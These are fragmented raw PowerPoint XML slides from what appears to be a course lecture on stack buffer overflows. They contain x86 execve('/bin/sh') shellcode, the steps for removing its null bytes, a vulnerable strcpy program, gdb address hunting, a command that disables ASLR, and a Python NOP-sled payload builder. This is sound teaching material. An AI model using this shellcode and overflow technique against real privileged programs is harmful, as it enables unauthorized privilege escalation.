                  <a:ext cx="782280" cy="40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1CFC82C4-0B57-4744-BF2A-421BE7A408C0}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6891817" y="2071035"/>
              <a:ext cx="1192680" cy="14616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1CFC82C4-0B57-4744-BF2A-421BE7A408C0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883177" y="2062035"/>
                <a:ext cx="121032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83B7E0AA-4940-4746-9EB9-6FBF9244ADB1}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5842057" y="2006595"/>
              <a:ext cx="676440" cy="1512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83B7E0AA-4940-4746-9EB9-6FBF9244ADB1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833417" y="1997595"/>
                <a:ext cx="694080" cy="3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0" name="Group 139">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{817F6ABF-1367-374D-A9D3-693351123373}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5903617" y="1687275"/>
            <a:ext cx="2456280" cy="217800"/>
            <a:chOff x="5903617" y="1687275"/>
            <a:chExt cx="2456280" cy="21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4398D62-BD01-A949-85E8-8E78D2E3E325}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5903617" y="1690155"/>
                <a:ext cx="208080" cy="135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4398D62-BD01-A949-85E8-8E78D2E3E32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894617" y="1681155"/>
                  <a:ext cx="2257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0D73283-FF48-1F4E-90AB-49FE1429D6D2}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6142657" y="1720395"/>
                <a:ext cx="195840" cy="1670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0D73283-FF48-1F4E-90AB-49FE1429D6D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133657" y="1711395"/>
                  <a:ext cx="2134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4D3A9E6-7D61-704D-A71D-B122DA0C42D6}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6658537" y="1687275"/>
                <a:ext cx="1640160" cy="2178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4D3A9E6-7D61-704D-A71D-B122DA0C42D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649897" y="1678275"/>
                  <a:ext cx="16578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B2BFF032-50A1-034B-9FCC-EE499C261223}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6673297" y="1716435"/>
                <a:ext cx="1686600" cy="72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B2BFF032-50A1-034B-9FCC-EE499C26122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664297" y="1707435"/>
                  <a:ext cx="170424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2C4B6578-2B71-774F-B1D2-00F5701CC63E}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7154257" y="2154555"/>
              <a:ext cx="1084680" cy="1512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2C4B6578-2B71-774F-B1D2-00F5701CC63E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145257" y="2145555"/>
                <a:ext cx="1102320" cy="3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8927899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Problem… </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>strcpy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strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>strcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, etc… all stop operating at the first </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> byte</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> contains </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zeroes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>we need to get rid of them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can do this for you (use a “filter”), along with any other bytes you don’t want</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>up to a limit, I assume</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> has to be ASCII, or worse, [0-9][A-Z][a-z]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Just eliminating zeros isn’t too hard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rid of zeroes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08048394 &lt;main&gt;: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8048394:       55                      push   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ebp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8048395:       89 e5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esp,%ebp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8048397:       83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04                sub    $0x4,%esp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804839a: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1c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80483b8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mcall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804839c:       5b                      pop    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ebx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804839d:       b8 00 00 00 00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$0x0,%eax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80483a2:       88 43 07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%al,0x7(%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80483a5:       89 5b 08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%ebx,0x8(%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80483a8:       89 43 0c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%eax,0xc(%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80483ab:       b8 0b 00 00 00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$0xb,%eax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80483b0:       8d 4b 08                lea    0x8(%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ecx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80483b3:       8d 53 0c                lea    0xc(%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edx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80483b6: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80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$0x80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80483b8:       e8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   call   804839c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ajmp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80483bd:       2f                      das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80483be:       62 69 6e                bound  %ebp,0x6e(%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ecx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80483c1:       2f                      das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80483c2:       73 68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804842c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50"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="18" presetID="5" presetClass="emph" presetSubtype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5" presetClass="emph" presetSubtype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50"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="27" presetID="3" presetClass="emph" presetSubtype="2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950"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="32" presetID="8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21600000">
                                      <p:cBhvr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21600000">
                                      <p:cBhvr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two offending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b8 00 00 00 00      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   $0x0,%eax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31 c0               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xor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   %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eax,%eax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b8 0b 00 00 00      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   $0xb,%eax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b0 0b               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   $0xb,%al</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pP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28918" y="2277035"/>
            <a:ext cx="8238564" cy="179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19953" y="4105835"/>
            <a:ext cx="8238564" cy="179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45976" y="5522259"/>
            <a:ext cx="3898183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 eliminate the zeros while making the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode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shorter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> at the same time!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dataseg2.c: amend two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22612"/>
            <a:ext cx="8153400" cy="458096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char sc[] =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"\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xeb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\x16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\x5b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\x31\xc0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\x88\x43\x07\x89\x5b\x08\x89\x43"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"\x0c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\xb0\x0b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\x8d\x4b\x08\x8d\x53\x0c\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xcd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\x80\xe8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\xe5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"\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xff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xff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xff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xAAAABBBB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main() {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*ret;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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ret =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*)&amp;ret+2;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*ret =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)sc;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$ ./dataseg2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sh4.2 $           </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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94306" y="1837765"/>
            <a:ext cx="5990551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 change the 2 instructions and adjust our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and call offsets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52164" y="6033247"/>
            <a:ext cx="3566746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still works!  Our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is 46 bytes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We’re Done!  Well…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have zero-less </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>relocatable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We just need to inject it into a privileged victim and we can escalate with the spawned shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Victim must be attached to your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (both </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>stdin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>stdout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You must be able to inject without an EOF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pipes often won’t work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often you would run a different command than /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consider modifying our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to run l33t instead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Injection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most obvious and natural place is to inject into the buffer we’re overflowing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>That’s the example we’ve been working with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This assume that the buffer will not be modified before the function returns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We could inject after the ret </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> too, but you will overwrite function parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Could mean you crash or have your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> modified before function returns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Let’s look at the methodology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It’s much easier to accomplish when you have source code alongside the binary victim on the local machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote/blind exploits are much harder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victim.c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char  filename[256];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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== 2)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(filename,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[1]);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>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Obvious buffer overflow due to use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>() instead of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>We’ll inject onto the stack, but where is the stack?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>We need address to jump to, so we can overwrite the return address with it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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80000"/>
              </a:lnSpc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main(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argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, char **</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv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    char  filename[256];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    if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> == 2)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        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(filename, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[1]);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800" dirty="0"/>
              <a:t>Why does C have so many poorly-designed library functions?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>strcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>(), etc…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 lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000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Stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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 a 32-bit machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Without ASLR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>echo 1 &gt; /proc/sys/kernel/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randomize_va_space</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="19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stack /proc/self/maps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ASLR is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>off</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> on razor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Increasingly on by default these days</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Means you have to do a LOT more guessing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On 64-bit machines it becomes very hard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack ends at 0xffffffff on razor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> may slightly perturb this value because of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In particular, the length of the program’s name has an effect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Poking around…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-q victim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 b main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Breakpoint 1 at 0x80483cd: file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victim.c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line 9.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 r AAAAAAA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Starting program: /home/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jrblack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shellcode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/victim AAAAAAA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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Breakpoint 1, main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=0xfffff8a4) at victim.c:9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9           if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== 2)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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pPr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10              strcpy(filename, argv[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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pPr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11      }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 x/4x filename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0xfffff718:     0x41414141      0x00414141      0x080481d0      0x00000001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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addresses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743640"/>
            <a:ext cx="8153400" cy="4495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 p &amp;filename[0]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$1 = 0xfffff718 "AAAAAAA”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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 p &amp;filename[256]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$2 = 0xfffff818 "x▒▒▒u▒▒\002"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 x/4 0xfffff818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0xfffff818:     0xfffff878     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0xf7e8d775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0x00000002      0xfffff8a4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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84377" y="2895595"/>
            <a:ext cx="244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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is at 0xfffff81c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4836463" y="3258668"/>
            <a:ext cx="295831" cy="2510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63271" y="4858871"/>
            <a:ext cx="6158609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So we need to fill the buffer with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, then whatever, then</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>with the address 0xfffff718 starting 260 bytes into the buffer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use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bash, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, C all work fine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$ cat sc.py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/bin/python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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sc = \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"\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xeb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\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43" +\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"\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\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\x80\xe8\xe5" +\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"\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xff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xff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xff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xAAAABBBB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print sc + "A"*(256-len(sc))+"AAAA"+"\x18\xf7\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xff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xff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$ ./victim $(./sc.py)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Illegal Instruction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$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56329" y="6006339"/>
            <a:ext cx="4306564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Let’s use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> victim, b main, r $(./sc.py)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Note: addresses found in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> are only approximate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Ok trying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0xfffff618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$ ./victim $(./sc.py)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Segmentation fault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$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Ok, this isn’t working… larger </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> size is shifting buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Plus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> perturbs the environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Introducing, “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xchg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%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, %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Does nothing, doesn’t even touch flag </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Op code is 0x90</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Aka “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NOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Let’s add a “NOP sled” to the front of our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>print "\x90"*(256-len(sc))+sc+"AAAA"+"\x18\xf7\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xff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700" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xff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48104" y="6338039"/>
            <a:ext cx="6718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changed back to 0xfffff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>18 since that’s about the midpoint of the sled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rot="5400000" flipH="1" flipV="1">
            <a:off x="6217024" y="6037729"/>
            <a:ext cx="412376" cy="331694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Sledding…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2046" y="1575993"/>
          <a:ext cx="527124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5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5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473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>start buffer: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\x90</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t>\x90\x90…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4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\x90</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t>\x90\x90…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4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\x90</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t>\x90\x90…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4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\x90</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t>\x90\x90…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4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\x90</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t>\x90\x90…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4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\x90</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t>\x90\x90…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4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\x90</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t>\x90\x90…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54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baseline="0" dirty="0"/>
                        <a:t> . . . . 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5473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>shellcode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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>xeb</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>\x16\x31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54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\xc0\xb0\x0b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54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 .</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t> . . . . .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54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end</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
